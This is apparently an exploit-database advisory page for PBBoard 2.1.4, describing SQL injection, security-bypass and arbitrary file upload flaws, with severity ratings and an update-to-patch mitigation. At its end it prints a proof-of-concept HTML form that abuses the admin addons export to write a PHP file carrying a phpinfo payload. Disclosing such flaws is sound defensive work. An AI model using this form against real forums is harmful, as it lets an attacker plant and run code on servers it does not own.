PBBoard Multiple Security Vulnerabilities

vendor:

PBBoard

by:

SecurityFocus

7,5

CVSS

HIGH

Multiple SQL-injection vulnerabilities, Security-bypass vulnerability, Arbitrary file upload vulnerability

89, 287, 264

CWE

Product Name: PBBoard

Affected Version From: 2.1.4

Affected Version To: 2.1.4

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

PBBoard Multiple Security Vulnerabilities

PBBoard is prone to multiple security vulnerabilities including multiple SQL-injection vulnerabilities, a security-bypass vulnerability, and an arbitrary file upload vulnerability. Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.

Mitigation:

Update to the latest version of PBBoard

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/54916/info
  
PBBoard is prone to multiple security vulnerabilities including:
  
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
  
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
  
PBBoard 2.1.4 is vulnerable; other versions may also be affected.


<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
<input type="hidden" name="context" value='<? phpinfo(); ?>'>
<input type="submit" name="Submit" value="Send">
</form>